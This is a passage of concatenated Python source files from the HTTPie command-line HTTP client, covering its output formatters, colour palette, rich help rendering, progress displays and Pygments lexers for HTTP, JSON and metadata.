groups to be applied :param env: Environment :param kwargs: additional keyword arguments for processors """ available_plugins = plugin_manager.get_formatters_grouped() self.enabled_plugins = [] for group in groups: for cls in available_plugins[group]: p = cls(env=env, **kwargs) if p.enabled: self.enabled_plugins.append(p) def format_headers(self, headers: str) -> str: for p in self.enabled_plugins: headers = p.format_headers(headers) return headers def format_body(self, content: str, mime: str) -> str: if is_valid_mime(mime): for p in self.enabled_plugins: content = p.format_body(content, mime) return content def format_metadata(self, metadata: str) -> str: for p in self.enabled_plugins: metadata = p.format_metadata(metadata) return metadata File: httpie/output/ui/__init__.py File: httpie/output/ui/palette.py from dataclasses import dataclass, field from enum import Enum, auto from typing import Optional, List PYGMENTS_BRIGHT_BLACK = 'ansibrightblack' AUTO_STYLE = 'auto' # Follows terminal ANSI color styles class Styles(Enum): PIE = auto() ANSI = auto() class PieStyle(str, Enum): UNIVERSAL = 'pie' DARK = 'pie-dark' LIGHT = 'pie-light' PIE_STYLE_TO_SHADE = { PieStyle.DARK: '500', PieStyle.UNIVERSAL: '600', PieStyle.LIGHT: '700', } SHADE_TO_PIE_STYLE = { shade: style for style, shade in PIE_STYLE_TO_SHADE.items() } class ColorString(str): def __or__(self, other: str) -> 'ColorString': """Combine a style with a property. E.g: PieColor.BLUE | BOLD | ITALIC """ if isinstance(other, str): # In case of PieColor.BLUE | SOMETHING # we just create a new string. return ColorString(self + ' ' + other) elif isinstance(other, GenericColor): # If we see a GenericColor, then we'll wrap it # in with the desired property in a different class. 
return _StyledGenericColor(other, styles=self.split()) elif isinstance(other, _StyledGenericColor): # And if it is already wrapped, we'll just extend the # list of properties. other.styles.extend(self.split()) return other else: return NotImplemented class PieColor(ColorString, Enum): """Styles that are available only in Pie themes.""" PRIMARY = 'primary' SECONDARY = 'secondary' WHITE = 'white' BLACK = 'black' GREY = 'grey' AQUA = 'aqua' PURPLE = 'purple' ORANGE = 'orange' RED = 'red' BLUE = 'blue' PINK = 'pink' GREEN = 'green' YELLOW = 'yellow' class GenericColor(Enum): """Generic colors that are safe to use everywhere.""" # <https://rich.readthedocs.io/en/stable/appendix/colors.html> WHITE = {Styles.PIE: PieColor.WHITE, Styles.ANSI: 'white'} BLACK = {Styles.PIE: PieColor.BLACK, Styles.ANSI: 'black'} GREEN = {Styles.PIE: PieColor.GREEN, Styles.ANSI: 'green'} ORANGE = {Styles.PIE: PieColor.ORANGE, Styles.ANSI: 'yellow'} YELLOW = {Styles.PIE: PieColor.YELLOW, Styles.ANSI: 'bright_yellow'} BLUE = {Styles.PIE: PieColor.BLUE, Styles.ANSI: 'blue'} PINK = {Styles.PIE: PieColor.PINK, Styles.ANSI: 'bright_magenta'} PURPLE = {Styles.PIE: PieColor.PURPLE, Styles.ANSI: 'magenta'} RED = {Styles.PIE: PieColor.RED, Styles.ANSI: 'red'} AQUA = {Styles.PIE: PieColor.AQUA, Styles.ANSI: 'cyan'} GREY = {Styles.PIE: PieColor.GREY, Styles.ANSI: 'bright_black'} def apply_style( self, style: Styles, *, style_name: Optional[str] = None ) -> str: """Apply the given style to a particular value.""" exposed_color = self.value[style] if style is Styles.PIE: assert style_name is not None shade = PIE_STYLE_TO_SHADE[PieStyle(style_name)] return get_color(exposed_color, shade) else: return exposed_color @dataclass class _StyledGenericColor: color: 'GenericColor' styles: List[str] = field(default_factory=list) # noinspection PyDictCreation COLOR_PALETTE = { # Copy the brand palette PieColor.WHITE: '#F5F5F0', PieColor.BLACK: '#1C1818', PieColor.GREY: { '50': '#F5F5F0', '100': '#EDEDEB', '200': '#D1D1CF', '300': '#B5B5B2', '400': '#999999', '500': '#7D7D7D', '600': '#666663', '700': '#4F4D4D', '800': '#363636', '900': '#1C1818', 'DEFAULT': '#7D7D7D', }, PieColor.AQUA: { '50': '#E8F0F5', '100': '#D6E3ED', '200': '#C4D9E5', '300': '#B0CCDE', '400': '#9EBFD6', '500': '#8CB4CD', '600': '#7A9EB5', '700': '#698799', '800': '#597082', '900': '#455966', 'DEFAULT': '#8CB4CD', }, PieColor.PURPLE: { '50': '#F0E0FC', '100': '#E3C7FA', '200': '#D9ADF7', '300': '#CC96F5', '400': '#BF7DF2', '500': '#B464F0', '600': '#9E54D6', '700': '#8745BA', '800': '#70389E', '900': '#5C2982', 'DEFAULT': '#B464F0', }, PieColor.ORANGE: { '50': '#FFEDDB', '100': '#FFDEBF', '200': '#FFCFA3', '300': '#FFBF87', '400': '#FFB06B', '500': '#FFA24E', '600': '#F2913D', '700': '#E3822B', '800': '#D6701C', '900': '#C75E0A', 'DEFAULT': '#FFA24E', }, PieColor.RED: { '50': '#FFE0DE', '100': '#FFC7C4', '200': '#FFB0AB', '300': '#FF968F', '400': '#FF8075', '500': '#FF665B', '600': '#E34F45', '700': '#C7382E', '800': '#AD2117', '900': '#910A00', 'DEFAULT': '#FF665B', }, PieColor.BLUE: { '50': '#DBE3FA', '100': '#BFCFF5', '200': '#A1B8F2', '300': '#85A3ED', '400': '#698FEB', '500': '#4B78E6', '600': '#426BD1', '700': '#3B5EBA', '800': '#3354A6', '900': '#2B478F', 'DEFAULT': '#4B78E6', }, PieColor.PINK: { '50': '#FFEBFF', '100': '#FCDBFC', '200': '#FCCCFC', '300': '#FCBAFC', '400': '#FAABFA', '500': '#FA9BFA', '600': '#DE85DE', '700': '#C26EC2', '800': '#A854A6', '900': '#8C3D8A', 'DEFAULT': '#FA9BFA', }, PieColor.GREEN: { '50': '#E3F7E8', '100': '#CCF2D6', '200': '#B5EDC4', 
'300': '#A1E8B0', '400': '#8AE09E', '500': '#73DC8C', '600': '#63C27A', '700': '#52AB66', '800': '#429154', '900': '#307842', 'DEFAULT': '#73DC8C', }, PieColor.YELLOW: { '50': '#F7F7DB', '100': '#F2F2BF', '200': '#EDEDA6', '300': '#E5E88A', '400': '#E0E36E', '500': '#DBDE52', '600': '#CCCC3D', '700': '#BABA29', '800': '#ABA614', '900': '#999400', 'DEFAULT': '#DBDE52', }, } COLOR_PALETTE.update( { # Terminal-specific palette customizations. PieColor.GREY: { # Grey is the same no matter shade for the colors shade: COLOR_PALETTE[PieColor.GREY]['500'] for shade in COLOR_PALETTE[PieColor.GREY].keys() }, PieColor.PRIMARY: { '700': COLOR_PALETTE[PieColor.BLACK], '600': PYGMENTS_BRIGHT_BLACK, '500': COLOR_PALETTE[PieColor.WHITE], }, PieColor.SECONDARY: { '700': '#37523C', '600': '#6c6969', '500': '#6c6969', }, } ) def boldify(color: PieColor) -> str: return f'bold {color}' # noinspection PyDefaultArgument def get_color( color: PieColor, shade: str, *, palette=COLOR_PALETTE ) -> Optional[str]: if color not in palette: return None color_code = palette[color] if isinstance(color_code, dict) and shade in color_code: return color_code[shade] else: return color_code File: httpie/output/ui/rich_utils.py import os from typing import Iterator from contextlib import contextmanager from rich.console import Console, RenderableType from rich.highlighter import Highlighter from httpie.output.ui.rich_palette import _make_rich_color_theme def render_as_string(renderable: RenderableType) -> str: """Render any `rich` object in a fake console and return a *style-less* version of it as a string.""" with open(os.devnull, 'w') as null_stream: fake_console = Console(file=null_stream, record=True, theme=_make_rich_color_theme()) fake_console.print(renderable) return fake_console.export_text() @contextmanager def enable_highlighter( console: Console, highlighter: Highlighter, ) -> Iterator[Console]: """Enable a highlighter temporarily.""" original_highlighter = console.highlighter try: console.highlighter = highlighter yield console finally: console.highlighter = original_highlighter File: httpie/output/ui/rich_help.py import re import textwrap from typing import AbstractSet, Iterable, Optional, Tuple from rich.console import RenderableType from rich.highlighter import RegexHighlighter from rich.padding import Padding from rich.table import Table from rich.text import Text from httpie.cli.constants import SEPARATOR_GROUP_ALL_ITEMS from httpie.cli.options import Argument, ParserSpec, Qualifiers from httpie.output.ui.palette import GenericColor SEPARATORS = '|'.join(map(re.escape, SEPARATOR_GROUP_ALL_ITEMS)) STYLE_METAVAR = GenericColor.YELLOW STYLE_SWITCH = GenericColor.GREEN STYLE_PROGRAM_NAME = GenericColor.GREEN # .boldify() STYLE_USAGE_OPTIONAL = GenericColor.GREY STYLE_USAGE_REGULAR = GenericColor.WHITE STYLE_USAGE_ERROR = GenericColor.RED STYLE_USAGE_MISSING = GenericColor.YELLOW STYLE_BOLD = 'bold' MAX_CHOICE_CHARS = 80 LEFT_PADDING_2 = (0, 0, 0, 2) LEFT_PADDING_3 = (0, 0, 0, 3) LEFT_PADDING_4 = (0, 0, 0, 4) LEFT_PADDING_5 = (0, 0, 0, 4) LEFT_INDENT_2 = (1, 0, 0, 2) LEFT_INDENT_3 = (1, 0, 0, 3) LEFT_INDENT_BOTTOM_3 = (0, 0, 1, 3) MORE_INFO_COMMANDS = """ To learn more, you can try: -> running 'http --manual' -> visiting our full documentation at https://httpie.io/docs/cli """ class OptionsHighlighter(RegexHighlighter): highlights = [ r'(^|\W)(?P<option>\-{1,2}[\w|-]+)(?![a-zA-Z0-9])', r'(?P<bold>HTTPie)', ] options_highlighter = OptionsHighlighter() def unpack_argument( argument: Argument, ) -> Tuple[Text, Text]: 
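    # Descriptive note: returns a (primary, secondary) pair of rich Text objects
    # for the argument -- its aliases when present (e.g. '--headers' / '-h'),
    # otherwise the metavar styled as regular usage text plus an empty Text.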
opt1 = opt2 = '' style = None if argument.aliases: if len(argument.aliases) >= 2: opt2, opt1 = argument.aliases else: (opt1,) = argument.aliases else: opt1 = argument.metavar style = STYLE_USAGE_REGULAR return Text(opt1, style=style), Text(opt2) def to_usage( spec: ParserSpec, *, program_name: Optional[str] = None, whitelist: AbstractSet[str] = frozenset() ) -> RenderableType: shown_arguments = [ argument for group in spec.groups for argument in group.arguments if (not argument.aliases or whitelist.intersection(argument.aliases)) ] # Sort the shown_arguments so that --dash options are # shown first shown_arguments.sort(key=lambda argument: argument.aliases, reverse=True) text = Text(program_name or spec.program, style=STYLE_BOLD) for argument in shown_arguments: text.append(' ') is_whitelisted = whitelist.intersection(argument.aliases) if argument.aliases: name = '/'.join(sorted(argument.aliases, key=len)) else: name = argument.metavar nargs = argument.configuration.get('nargs') if nargs is Qualifiers.OPTIONAL: text.append('[' + name + ']', style=STYLE_USAGE_OPTIONAL) elif nargs is Qualifiers.ZERO_OR_MORE: text.append( '[' + name + ' ...]', style=STYLE_USAGE_OPTIONAL, ) else: text.append( name, style=STYLE_USAGE_ERROR if is_whitelisted else STYLE_USAGE_REGULAR, ) raw_form = argument.serialize() if raw_form.get('choices'): text.append(' ') text.append( '{' + ', '.join(raw_form['choices']) + '}', style=STYLE_USAGE_MISSING, ) return text # This part is loosely based on the rich-click's help message # generation. def to_help_message( spec: ParserSpec, ) -> Iterable[RenderableType]: yield Padding( options_highlighter(spec.description), LEFT_INDENT_2, ) yield Padding( Text('Usage', style=STYLE_SWITCH), LEFT_INDENT_2, ) yield Padding(to_usage(spec), LEFT_INDENT_3) group_rows = {} for group in spec.groups: options_rows = [] for argument in group.arguments: if argument.is_hidden: continue opt1, opt2 = unpack_argument(argument) if opt2: opt1.append('/') opt1.append(opt2) # Column for a metavar, if we have one metavar = Text(style=STYLE_METAVAR) metavar.append(argument.configuration.get('metavar', '')) if opt1 == metavar: metavar = Text('') raw_form = argument.serialize() desc = raw_form.get('short_description', '') if raw_form.get('choices'): desc += ' (choices: ' desc += textwrap.shorten( ', '.join(raw_form.get('choices')), MAX_CHOICE_CHARS, ) desc += ')' rows = [ Padding( options_highlighter(opt1), LEFT_PADDING_2, ), metavar, options_highlighter(desc), ] options_rows.append(rows) if argument.configuration.get('nested_options'): options_rows.extend( [ ( Padding( Text( key, style=STYLE_USAGE_OPTIONAL, ), LEFT_PADDING_4, ), value, dec, ) for key, value, dec in argument.nested_options ] ) group_rows[group.name] = options_rows options_table = Table(highlight=False, box=None, show_header=False) for group_name, options_rows in group_rows.items(): options_table.add_row(Text(), Text(), Text()) options_table.add_row( Text(group_name, style=STYLE_SWITCH), Text(), Text(), ) options_table.add_row(Text(), Text(), Text()) for row in options_rows: options_table.add_row(*row) yield Padding( Text('Options', style=STYLE_SWITCH), LEFT_INDENT_2, ) yield Padding(options_table, LEFT_PADDING_2) yield Padding( Text('More Information', style=STYLE_SWITCH), LEFT_INDENT_2, ) yield Padding( MORE_INFO_COMMANDS.rstrip('\n'), LEFT_PADDING_3 ) yield Padding( spec.epilog.rstrip('\n'), LEFT_INDENT_BOTTOM_3, ) File: httpie/output/ui/man_pages.py """Logic for checking and displaying man pages.""" import subprocess import os from 
httpie.context import Environment MAN_COMMAND = 'man' NO_MAN_PAGES = os.getenv('HTTPIE_NO_MAN_PAGES', False) # On some systems, HTTP(n) might exist, but we are only interested in HTTP(1). # For more information on man page sections: <https://unix.stackexchange.com/a/138643> MAN_PAGE_SECTION = '1' def is_available(program: str) -> bool: """ Check whether `program`'s man pages are available on this system. """ if NO_MAN_PAGES or os.system == 'nt': return False try: process = subprocess.run( [MAN_COMMAND, MAN_PAGE_SECTION, program], shell=False, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL ) except Exception: # There might be some errors outside the process, e.g # a permission error to execute something that is not an # executable. return False else: return process.returncode == 0 def display_for(env: Environment, program: str) -> None: """ Open the system man page for the given command (http/https/httpie). """ subprocess.run( [MAN_COMMAND, MAN_PAGE_SECTION, program], stdout=env.stdout, stderr=env.stderr ) File: httpie/output/ui/rich_palette.py from collections import ChainMap from typing import TYPE_CHECKING, Any, Optional if TYPE_CHECKING: from rich.theme import Theme from httpie.output.ui.palette import GenericColor, PieStyle, Styles, ColorString, _StyledGenericColor # noqa RICH_BOLD = ColorString('bold') # Rich-specific color code declarations # <https://github.com/Textualize/rich/blob/fcd684dd3a482977cab620e71ccaebb94bf13ac9/rich/default_styles.py> CUSTOM_STYLES = { 'progress.description': RICH_BOLD | GenericColor.WHITE, 'progress.data.speed': RICH_BOLD | GenericColor.GREEN, 'progress.percentage': RICH_BOLD | GenericColor.AQUA, 'progress.download': RICH_BOLD | GenericColor.AQUA, 'progress.remaining': RICH_BOLD | GenericColor.ORANGE, 'bar.complete': RICH_BOLD | GenericColor.PURPLE, 'bar.finished': RICH_BOLD | GenericColor.GREEN, 'bar.pulse': RICH_BOLD | GenericColor.PURPLE, 'option': RICH_BOLD | GenericColor.PINK, } class _GenericColorCaster(dict): """ Translate GenericColor to a regular string on the attribute access phase. """ def _translate(self, key: Any) -> Any: if isinstance(key, GenericColor): return key.name.lower() else: return key def __getitem__(self, key: Any) -> Any: return super().__getitem__(self._translate(key)) def get(self, key: Any) -> Any: return super().get(self._translate(key)) def _make_rich_color_theme(style_name: Optional[str] = None) -> 'Theme': from rich.style import Style from rich.theme import Theme try: PieStyle(style_name) except ValueError: style = Styles.ANSI else: style = Styles.PIE theme = Theme() for color, color_set in ChainMap( GenericColor.__members__, CUSTOM_STYLES ).items(): if isinstance(color_set, _StyledGenericColor): properties = dict.fromkeys(color_set.styles, True) color_set = color_set.color else: properties = {} theme.styles[color.lower()] = Style( color=color_set.apply_style(style, style_name=style_name), **properties, ) # E.g translate GenericColor.BLUE into blue on key access theme.styles = _GenericColorCaster(theme.styles) return theme File: httpie/output/ui/rich_progress.py from dataclasses import dataclass from typing import TYPE_CHECKING, Optional from httpie.context import Environment if TYPE_CHECKING: from rich.console import Console @dataclass class BaseDisplay: env: Environment def start( self, *, total: Optional[float], at: float, description: str ) -> None: ... def update(self, steps: float) -> None: ... def stop(self, time_spent: float) -> None: ... 
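    # The concrete displays below build on this interface: DummyDisplay keeps
    # the no-op defaults, StatusDisplay shows a spinner when the total size is
    # unknown, and ProgressDisplay shows a progress bar when it is known.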
@property def console(self) -> 'Console': """Returns the default console to be used with displays (stderr).""" return self.env.rich_error_console def _print_summary( self, is_finished: bool, observed_steps: int, time_spent: float ): from rich import filesize if is_finished: verb = 'Done' else: verb = 'Interrupted' total_size = filesize.decimal(observed_steps) avg_speed = filesize.decimal(observed_steps / time_spent) minutes, seconds = divmod(time_spent, 60) hours, minutes = divmod(int(minutes), 60) if hours: total_time = f'{hours:d}:{minutes:02d}:{seconds:0.5f}' else: total_time = f'{minutes:02d}:{seconds:0.5f}' self.console.print( f'[progress.description]{verb}. {total_size} in {total_time} ({avg_speed}/s)' ) class DummyDisplay(BaseDisplay): """ A dummy display object to be used when the progress bars, spinners etc. are disabled globally (or during tests). """ class StatusDisplay(BaseDisplay): def start( self, *, total: Optional[float], at: float, description: str ) -> None: self.observed = at self.description = ( f'[progress.description]{description}[/progress.description]' ) self.status = self.console.status(self.description, spinner='line') self.status.start() def update(self, steps: float) -> None: from rich import filesize self.observed += steps observed_amount, observed_unit = filesize.decimal( self.observed ).split() self.status.update( status=f'{self.description} [progress.download]{observed_amount}/? {observed_unit}[/progress.download]' ) def stop(self, time_spent: float) -> None: self.status.stop() self.console.print(self.description) if time_spent: self._print_summary( is_finished=True, observed_steps=self.observed, time_spent=time_spent, ) class ProgressDisplay(BaseDisplay): def start( self, *, total: Optional[float], at: float, description: str ) -> None: from rich.progress import ( Progress, BarColumn, DownloadColumn, TimeRemainingColumn, TransferSpeedColumn, ) assert total is not None self.console.print(f'[progress.description]{description}') self.progress_bar = Progress( '[', BarColumn(), ']', '[progress.percentage]{task.percentage:>3.0f}%', '(', DownloadColumn(), ')', TimeRemainingColumn(), TransferSpeedColumn(), console=self.console, transient=True, ) self.progress_bar.start() self.transfer_task = self.progress_bar.add_task( description, completed=at, total=total ) def update(self, steps: float) -> None: self.progress_bar.advance(self.transfer_task, steps) def stop(self, time_spent: Optional[float]) -> None: self.progress_bar.stop() if time_spent: [task] = self.progress_bar.tasks self._print_summary( is_finished=task.finished, observed_steps=task.completed, time_spent=time_spent, ) File: httpie/output/lexers/metadata.py import pygments from httpie.models import ELAPSED_TIME_LABEL from httpie.output.lexers.common import precise SPEED_TOKENS = { 0.45: pygments.token.Number.SPEED.FAST, 1.00: pygments.token.Number.SPEED.AVG, 2.50: pygments.token.Number.SPEED.SLOW, } def speed_based_token(lexer, match, ctx): try: value = float(match.group()) except ValueError: return pygments.token.Number for limit, token in SPEED_TOKENS.items(): if value <= limit: break else: token = pygments.token.Number.SPEED.VERY_SLOW response_type = precise( lexer, token, pygments.token.Number ) yield match.start(), response_type, match.group() class MetadataLexer(pygments.lexer.RegexLexer): """Simple HTTPie metadata lexer.""" tokens = { 'root': [ ( fr'({ELAPSED_TIME_LABEL})( *)(:)( *)(\d+\.\d+)(s)', pygments.lexer.bygroups( pygments.token.Name.Decorator, # Name pygments.token.Text, 
pygments.token.Operator, # Colon pygments.token.Text, speed_based_token, pygments.token.Name.Builtin # Value ) ), # Generic item ( r'(.*?)( *)(:)( *)(.+)', pygments.lexer.bygroups( pygments.token.Name.Decorator, # Name pygments.token.Text, pygments.token.Operator, # Colon pygments.token.Text, pygments.token.Text # Value ) ), ] } File: httpie/output/lexers/__init__.py File: httpie/output/lexers/common.py def precise(lexer, precise_token, parent_token): # Due to a pygments bug*, custom tokens will look bad # on outside styles. Until it is fixed on upstream, we'll # convey whether the client is using pie style or not # through precise option and return more precise tokens # depending on it's value. # # [0]: https://github.com/pygments/pygments/issues/1986 if precise_token is None or not lexer.options.get("precise"): return parent_token else: return precise_token File: httpie/output/lexers/http.py import re import pygments from httpie.output.lexers.common import precise RE_STATUS_LINE = re.compile(r'(\d{3})( +)?(.+)?') STATUS_TYPES = { '1': pygments.token.Number.HTTP.INFO, '2': pygments.token.Number.HTTP.OK, '3': pygments.token.Number.HTTP.REDIRECT, '4': pygments.token.Number.HTTP.CLIENT_ERR, '5': pygments.token.Number.HTTP.SERVER_ERR, } RESPONSE_TYPES = { 'GET': pygments.token.Name.Function.HTTP.GET, 'HEAD': pygments.token.Name.Function.HTTP.HEAD, 'POST': pygments.token.Name.Function.HTTP.POST, 'PUT': pygments.token.Name.Function.HTTP.PUT, 'PATCH': pygments.token.Name.Function.HTTP.PATCH, 'DELETE': pygments.token.Name.Function.HTTP.DELETE, } def http_response_type(lexer, match, ctx): status_match = RE_STATUS_LINE.match(match.group()) if status_match is None: return None status_code, text, reason = status_match.groups() status_type = precise( lexer, STATUS_TYPES.get(status_code[0]), pygments.token.Number ) groups = pygments.lexer.bygroups( status_type, pygments.token.Text, status_type ) yield from groups(lexer, status_match, ctx) def request_method(lexer, match, ctx): response_type = precise( lexer, RESPONSE_TYPES.get(match.group()), pygments.token.Name.Function ) yield match.start(), response_type, match.group() class SimplifiedHTTPLexer(pygments.lexer.RegexLexer): """Simplified HTTP lexer for Pygments. It only operates on headers and provides a stronger contrast between their names and values than the original one bundled with Pygments (:class:`pygments.lexers.text import HttpLexer`), especially when Solarized color scheme is used. 
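    For example, a request line such as 'GET /api HTTP/1.1' is tokenized into
    method, path and version, and the method is mapped to a dedicated token
    type when the `precise` lexer option is enabled.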
""" name = 'HTTP' aliases = ['http'] filenames = ['*.http'] tokens = { 'root': [ # Request-Line (r'([A-Z]+)( +)([^ ]+)( +)(HTTP)(/)(\d+\.\d+)', pygments.lexer.bygroups( request_method, pygments.token.Text, pygments.token.Name.Namespace, pygments.token.Text, pygments.token.Keyword.Reserved, pygments.token.Operator, pygments.token.Number )), # Response Status-Line (r'(HTTP)(/)(\d+\.\d+)( +)(.+)', pygments.lexer.bygroups( pygments.token.Keyword.Reserved, # 'HTTP' pygments.token.Operator, # '/' pygments.token.Number, # Version pygments.token.Text, http_response_type, # Status code and Reason )), # Header (r'(.*?)( *)(:)( *)(.+)', pygments.lexer.bygroups( pygments.token.Name.Attribute, # Name pygments.token.Text, pygments.token.Operator, # Colon pygments.token.Text, pygments.token.String # Value )) ] } File: httpie/output/lexers/json.py import re from pygments.lexer import bygroups, using, RegexLexer from pygments.lexers.data import JsonLexer from pygments.token import Token PREFIX_TOKEN = Token.Error PREFIX_REGEX = r'[^{\["]+' class EnhancedJsonLexer(RegexLexer): """ Enhanced JSON lexer for Pygments. It adds support for eventual data prefixing the actual JSON body. """ name = 'JSON' flags = re.IGNORECASE | re.DOTALL tokens = { 'root': [ # Eventual non-JSON data prefix followed by actual JSON body. # FIX: data prefix + number (integer or float) is not correctly handled. ( fr'({PREFIX_REGEX})' + r'((?:[{\["]|true|false|null).+)', bygroups(PREFIX_TOKEN, using(JsonLexer)) ), # JSON body. (r'.+', using(JsonLexer)), ], } File: httpie/output/formatters/xml.py from typing import TYPE_CHECKING, Optional from ...encoding import UTF8 from ...plugins import FormatterPlugin if TYPE_CHECKING: from xml.dom.minidom import Document XML_DECLARATION_OPEN = '<?xml' XML_DECLARATION_CLOSE = '?>' def parse_xml(data: str) -> 'Document': """Parse given XML `data` string into an appropriate :class:`~xml.dom.minidom.Document` object.""" from defusedxml.minidom import parseString return parseString(data) def parse_declaration(raw_body: str) -> Optional[str]: body = raw_body.strip() # XMLDecl ::= '<?xml' DECL_CONTENT '?>' if body.startswith(XML_DECLARATION_OPEN): end = body.find(XML_DECLARATION_CLOSE) if end != -1: return body[:end + len(XML_DECLARATION_CLOSE)] def pretty_xml(document: 'Document', declaration: Optional[str] = None, encoding: Optional[str] = UTF8, indent: int = 2) -> str: """Render the given :class:`~xml.dom.minidom.Document` `document` into a prettified string.""" kwargs = { 'encoding': encoding or UTF8, 'indent': ' ' * indent, } body = document.toprettyxml(**kwargs).decode(kwargs['encoding']) # Remove blank lines automatically added by `toprettyxml()`. lines = [line for line in body.splitlines() if line.strip()] # xml.dom automatically adds the declaration, even if # it is not present in the actual body. Remove it. if len(lines) >= 1 and parse_declaration(lines[0]): lines.pop(0) if declaration: lines.insert(0, declaration) return '\n'.join(lines) class XMLFormatter(FormatterPlugin): def __init__(self, **kwargs): super().__init__(**kwargs) self.enabled = self.format_options['xml']['format'] def format_body(self, body: str, mime: str): if 'xml' not in mime: return body from xml.parsers.expat import ExpatError from defusedxml.common import DefusedXmlException declaration = parse_declaration(body) try: parsed_body = parse_xml(body) except ExpatError: pass # Invalid XML, ignore. except DefusedXmlException: pass # Unsafe XML, ignore. 
else: body = pretty_xml(parsed_body, encoding=parsed_body.encoding, indent=self.format_options['xml']['indent'], declaration=declaration) return body File: httpie/output/formatters/__init__.py File: httpie/output/formatters/headers.py from ...plugins import FormatterPlugin class HeadersFormatter(FormatterPlugin): def __init__(self, **kwargs): super().__init__(**kwargs) self.enabled = self.format_options['headers']['sort'] def format_headers(self, headers: str) -> str: """ Sorts headers by name while retaining relative order of multiple headers with the same name. """ lines = headers.splitlines() headers = sorted(lines[1:], key=lambda h: h.split(':')[0]) return '\r\n'.join(lines[:1] + headers) File: httpie/output/formatters/json.py import json from ...plugins import FormatterPlugin class JSONFormatter(FormatterPlugin): def __init__(self, **kwargs): super().__init__(**kwargs) self.enabled = self.format_options['json']['format'] def format_body(self, body: str, mime: str) -> str: maybe_json = [ 'json', 'javascript', 'text', ] if (self.kwargs['explicit_json'] or any(token in mime for token in maybe_json)): from ..utils import load_prefixed_json try: data_prefix, json_obj = load_prefixed_json(body) except ValueError: pass # Invalid JSON, ignore. else: # Indent, sort keys by name, and avoid # unicode escapes to improve readability. body = data_prefix + json.dumps( obj=json_obj, sort_keys=self.format_options['json']['sort_keys'], ensure_ascii=False, indent=self.format_options['json']['indent'] ) return body File: httpie/output/formatters/colors.py import json from typing import Optional, Type, Tuple import pygments.formatters import pygments.lexer import pygments.lexers import pygments.style import pygments.styles import pygments.token from pygments.formatters.terminal import TerminalFormatter from pygments.formatters.terminal256 import Terminal256Formatter from pygments.lexer import Lexer from pygments.lexers.data import JsonLexer from pygments.lexers.special import TextLexer from pygments.lexers.text import HttpLexer as PygmentsHttpLexer from pygments.util import ClassNotFound from ..lexers.json import EnhancedJsonLexer from ..lexers.metadata import MetadataLexer from ..ui.palette import AUTO_STYLE, SHADE_TO_PIE_STYLE, PieColor, ColorString, get_color from ...context import Environment from ...plugins import FormatterPlugin DEFAULT_STYLE = AUTO_STYLE SOLARIZED_STYLE = 'solarized' # Bundled here PYGMENTS_BOLD = ColorString('bold') PYGMENTS_ITALIC = ColorString('italic') BUNDLED_STYLES = { SOLARIZED_STYLE, AUTO_STYLE } def get_available_styles(): return sorted(BUNDLED_STYLES | set(pygments.styles.get_all_styles())) class ColorFormatter(FormatterPlugin): """ Colorize using Pygments This processor that applies syntax highlighting to the headers, and also to the body if its content type is recognized. 
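    When the terminal reports fewer than 256 colors, or the 'auto' style is in
    effect, it falls back to Pygments' TerminalFormatter and the stock Pygments
    HTTP lexer instead of HTTPie's own SimplifiedHTTPLexer and 256-color
    formatters.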
""" group_name = 'colors' metadata_lexer = MetadataLexer() def __init__( self, env: Environment, explicit_json=False, color_scheme=DEFAULT_STYLE, **kwargs ): super().__init__(**kwargs) if not env.colors: self.enabled = False return use_auto_style = color_scheme == AUTO_STYLE has_256_colors = env.colors == 256 if use_auto_style or not has_256_colors: http_lexer = PygmentsHttpLexer() body_formatter = header_formatter = TerminalFormatter() precise = False else: from ..lexers.http import SimplifiedHTTPLexer header_formatter, body_formatter, precise = self.get_formatters(color_scheme) http_lexer = SimplifiedHTTPLexer(precise=precise) self.explicit_json = explicit_json # --json self.header_formatter = header_formatter self.body_formatter = body_formatter self.http_lexer = http_lexer self.metadata_lexer = MetadataLexer(precise=precise) def format_headers(self, headers: str) -> str: return pygments.highlight( code=headers, lexer=self.http_lexer, formatter=self.header_formatter, ).strip() def format_body(self, body: str, mime: str) -> str: lexer = self.get_lexer_for_body(mime, body) if lexer: body = pygments.highlight( code=body, lexer=lexer, formatter=self.body_formatter, ) return body def format_metadata(self, metadata: str) -> str: return pygments.highlight( code=metadata, lexer=self.metadata_lexer, formatter=self.header_formatter, ).strip() def get_lexer_for_body( self, mime: str, body: str ) -> Optional[Type[Lexer]]: return get_lexer( mime=mime, explicit_json=self.explicit_json, body=body, ) def get_formatters(self, color_scheme: str) -> Tuple[ pygments.formatter.Formatter, pygments.formatter.Formatter, bool ]: if color_scheme in PIE_STYLES: header_style, body_style = PIE_STYLES[color_scheme] precise = True else: header_style = self.get_style_class(color_scheme) body_style = header_style precise = False return ( Terminal256Formatter(style=header_style), Terminal256Formatter(style=body_style), precise ) @staticmethod def get_style_class(color_scheme: str) -> Type[pygments.style.Style]: try: return pygments.styles.get_style_by_name(color_scheme) except ClassNotFound: return Solarized256Style def get_lexer( mime: str, explicit_json=False, body='' ) -> Optional[Type[Lexer]]: # Build candidate mime type and lexer names. mime_types, lexer_names = [mime], [] type_, subtype = mime.split('/', 1) if '+' not in subtype: lexer_names.append(subtype) else: subtype_name, subtype_suffix = subtype.split('+', 1) lexer_names.extend([subtype_name, subtype_suffix]) mime_types.extend([ f'{type_}/{subtype_name}', f'{type_}/{subtype_suffix}', ]) # As a last resort, if no lexer feels responsible, and # the subtype contains 'json', take the JSON lexer if 'json' in subtype: lexer_names.append('json') # Try to resolve the right lexer. lexer = None for mime_type in mime_types: try: lexer = pygments.lexers.get_lexer_for_mimetype(mime_type) break except ClassNotFound: pass else: for name in lexer_names: try: lexer = pygments.lexers.get_lexer_by_name(name) except ClassNotFound: pass if explicit_json and body and (not lexer or isinstance(lexer, TextLexer)): # JSON response with an incorrect Content-Type? try: json.loads(body) # FIXME: the body also gets parsed in json.py except ValueError: pass # Nope else: lexer = pygments.lexers.get_lexer_by_name('json') # Use our own JSON lexer: it supports JSON bodies preceded by non-JSON data # as well as legit JSON bodies. 
